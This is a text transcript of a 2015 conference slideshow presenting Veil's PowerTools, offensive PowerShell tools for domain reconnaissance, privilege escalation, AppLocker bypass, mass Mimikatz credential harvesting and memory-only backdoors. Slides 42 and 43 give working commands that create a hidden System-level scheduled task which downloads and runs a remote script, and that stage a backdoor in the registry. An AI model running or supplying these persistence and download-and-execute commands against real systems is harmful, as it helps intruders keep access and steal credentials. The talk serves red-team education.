Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Drilling deeper with Veil's PowerTools


Published on

This presentation covers Veil's PowerTools, a set of offensive PowerShell tools. It was presented at CarolinaCon '11 on 3/20/2015.

Published in: Internet

Drilling deeper with Veil's PowerTools

  1. 1. Drilling Deeper with Veil’s PowerTools Justin Warner, Will Schroeder Veris Group’s Adaptive Threat Division
  2. 2. @sixdub ◎Pentester and red teamer for the Adaptive Threat Division of Veris Group ◎Lots of interest: red team ops, reverse engineering, adversarial tactics, etc ◎Developer on the Veil-Framework and co-founder of Veil’s PowerTools
  3. 3. @harmj0y ◎Security researcher and red teamer for the Adaptive Threat Division of Veris Group ◎Co-founder of the Veil-Framework and founder of Veil’s PowerTools ◎Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides
  4. 4. tl;dr ◎Introduction ◎PowerView ◎PowerUp ◎PowerPick ◎PewPewPew ◎PowerBreach ◎Dear M$ ◎Demos ◎Questions
  5. 5. Introduction How We Got Here
  6. 6. The Veil-Framework ◎An offensive toolkit aimed at bridging the gap between pentesting and red teaming capabilities ◎Started with the release of Veil-Evasion ○ expanded with Catapult, Pillage, and PowerView ◎CarolinaCon 2014 - “The Veil- Framework”
  7. 7. Veil’s PowerTools ◎All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo ◎PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python projects
  8. 8. Sidenote: Why PowerShell ○ PowerShell provides (out of the box): □ Full .NET access □ application whitelisting □ direct access to the Win32 API □ ability to execute purely in memory □ default installation Win7+ ! ○ “Why I Choose PowerShell as an Attack Platform” □ Choose-PowerShell.html
  9. 9. “Bad Guys”
  10. 10. “ “Microsoft’s Post-Exploitation Language” PowerShell: -@obscuresec
  11. 11. PowerView Domain Situational Awareness
  12. 12. ◎Think dsquery on steroids... and cocaine ◎First started because a client banned “net” commands on domain machines ◎Otherwise initially inspired by Rob Fuller’s netview.exe tool ○ Wanted something more flexible that also didn’t drop a binary to disk Background
  13. 13. User Hunting ◎Goal: find which domain machines specific users are logged into ◎Invoke-UserHunter: finds where target users or group members are logged into on the network ◎Invoke-StealthUserHunter: extracts user homeDirectories from AD, gets sessions on all these file servers to hunt for targets ○ Significantly less traffic than Invoke-UserHunter
  14. 14. Offensive Event Parsing ◎Once you get DA, domain controller event logs make it trivial to track down user locations ◎PowerView’s Get-UserLogonEvents lets you easily extract account logon events (4624) from a host ◎Invoke-UserEventHunter wraps this all up into a weaponized form
  15. 15. Domain Trusts ◎PowerView can now enumerate and exploit existing domain trusts: ○ Get-NetDomainTrusts, Get-NetForestDomains ◎Most PowerView functions now accept a “-Domain <name>” flag, allowing them to operate across trusts ○ e.g. Get-NetUsers –Domain sub.test.local ◎Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold
  16. 16. Data Mining ◎PowerView’s Invoke-ShareFinder - CheckAccess can find all shares readable by the current user ◎Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder ◎Spits out a .csv of found files, sortable by creation or last access times
  17. 17. PowerUp Automating Windows Privesc
  18. 18. Background ◎On past assessments, had to escalate privileges on a locked down workstation ◎Kernel exploits wouldn’t work, so fell back to vulnerable service binaries ◎More or less did everything manually, wanted something a bit easier ○ Started implementing the “Encyclopedia of Privesc”
  19. 19. Windows Services ◎One of the most effective escalation vectors was (and still is) vulnerable Windows services ○ Sometimes can modify a service itself ○ Get-ServicePerms will check for these ◎However, many organizations overlook the permissions for service binaries :) ○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an agent
  20. 20. .DLL Hijacking ◎Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable ◎If you have write access to any folder in PATH, there’s a good chance you can drop a malicious DLL and escalate privileges ○ Invoke-FindPathHijack will search for these opportunities
  21. 21. PowerUp ◎Automates everything we’ve talked about, and more ◎Invoke-AllChecks will run all current checks against a host ◎Functions exist to abuse most of the escalation vectors found
  22. 22. PowerPick Lock Picking the AppLocker
  23. 23. Background ◎ Incident responders are recognizing and targeting PowerShell.exe ○ Had a client write HIPS rules against psh_psexec, YA, for reals ◎ We wanted to be prepared for more situations like this ◎ Developed PowerPick as a combination of solutions to run PowerShell without powershell.exe
  24. 24. Bypassing the Blacklist ◎ Used assemblies in .NET/C# to execute code ○ System.Management.Automation ◎ Developed SharpPick ○ powershell-a-red-teamers-tale-of-overcoming- simple-applocker-policies/ ◎ To defeat with blacklist policy (not ideal), must permission off or block DLLs in the Global Assembly Cache (GAC) ○ C:WindowsAssembly*
  25. 25. OH BTW
  26. 26. Runspaces in Unmanaged Code ◎SharpPick wasn’t very sexy ○ Binary on disk = Lame! ◎Lee Christensen (@tifkin_) authored “UnmanagedPowerShell” to utilize .NET assemblies from C ○ Uses CLR and custom .NET assembly in memory ○ werShell ◎Transformed this code into a reflective DLL = ReflectivePick
  27. 27. PowerShell Inception = Injection!! ◎Decided it needed more PowerShell ◎Embedded ReflectivePick into Invoke- ReflectivePEInjection from Powersploit by @josephbialek ○ Created Invoke-PSInjector ◎Injects DLL into remote process that runs PowerShell code
  28. 28. ReflectivePick Diagram *.exe Invoke-PSInjector ReflectivePick .NET Assembly Download Cradle
  29. 29. Invoke-PowerCeption?
  30. 30. PewPewPew Launching Lazerz at your Targets
  31. 31. Invoke-Mass* ◎Model to run PowerShell scripts on a mass number of machines and retrieve results: 1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file 2. A IEX() one-liner is executed on machines through WMI to download/executed the hosted code 3. Results are POSTed back to the local webserver
  32. 32. Invoke-MassMimikatz ◎Executes PowerSploit’s Invoke- Mimikatz on multiple machines without PSRemoting ◎Raw Mimikatz results are saved on the pivot host ◎Result files are parsed and Server:Credential objects are output to the pipeline
  33. 33. Invoke-MassMimikatz
  34. 34. Invoke-MassSearch ◎Microsoft has another gift for attackers, the Windows Search Indexing Service ○ Why search through all of a system’s file when Windows does this for you? ◎Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz ○ allows you to query the search indexer across machines where you have admin access
  35. 35. PowerBreach New Release
  36. 36. Background ◎One obvious gap remaining in workflow of Veil PowerTools ◎Motivation: offense in depth theory ◎Wanted multiple easy ways to remain resident on the compromised systems ○ Memory only
  37. 37. PowerBreach ◎Yes… More PowerShell ○ Why not utilize our favorite scripting language?! ◎Goal: automate a bunch of techniques/tools to backdoor a system ◎Multiple triggers, various host/network signatures ○ We will show some of the “cool” ones
  38. 38. Invoke-EventLogBackdoor ◎Based on Shmoocon 2013 “Wipe The Drive” by Jake Williams (@MalwareJake) ◎Uses Get-WinEvent to monitor windows event logs for failed RDP attempts ◎When it recognizes “trigger” username, phones home to attacker ○ With an IEX(...) download cradle
  39. 39. Invoke-PortKnockBackdoor ◎Based upon Get-Packet by Robbie Foust ○ Uses to create raw socket ○ Uses socket.iocontrol to make promiscuous ◎Promiscuously sniffs traffic on system and inspects data for “magic” trigger value ○ UDP, TCP, ICMP
  40. 40. Invoke-DeadUserBackdoor ◎Common action of attackers is to add domain/local users ◎Uses ADSI to monitor for a users existence ◎If the user is not found, assumes the worst and phones home
  41. 41. Invoke-ResolverBackdoor ◎Attempts to be a little stealthier and usable on external assessments ◎Resolves specified DNS name on interval and if the resolution doesn’t equal a predefined IP... ◎… PHONE HOME TO THAT IP!
  42. 42. Persistence… If you must ◎Focuses more on non-persistent backdoors ◎Schedule tasks seem to work really well for PowerShell in domain networks schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://server/scri pt.ps1'''))'" /sc onlogon /ru System
  43. 43. Registry Storage ◎Better yet, stage your script in the registry! $backdoor = "write-host 123” Set-ItemProperty -Path 'HKLM:HARDWARE' -Name 'secret' -Value $backdoor schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:HARDWARE secret).secret'" /sc onlogon /ru System
  44. 44. So what? ◎Nothing revolutionary here! ◎Nothing worse than owning a system and not being able to get back on later! ◎Real power comes when combining PowerTools ○ PewPewPew with PowerBreach
  45. 45. 2 Cents Almost ready for the show!
  46. 46. Obligatory Defense Slide ◎HIPs and Whitelisting generally help endpoint defense ◎Enterprise incident response capabilities ○ Memory only capabilities but scripts (“malware”) able to be easily recovered and analyzed ◎Need a clear way to restrict PowerShell & .NET assemblies to certain users
  47. 47. True Story…
  48. 48. Demos
  49. 49. Questions? ◎Justin ○ @sixsub ○ ○ justin [at] ◎Will ○ @harmj0y ○ ○ will [at] ◎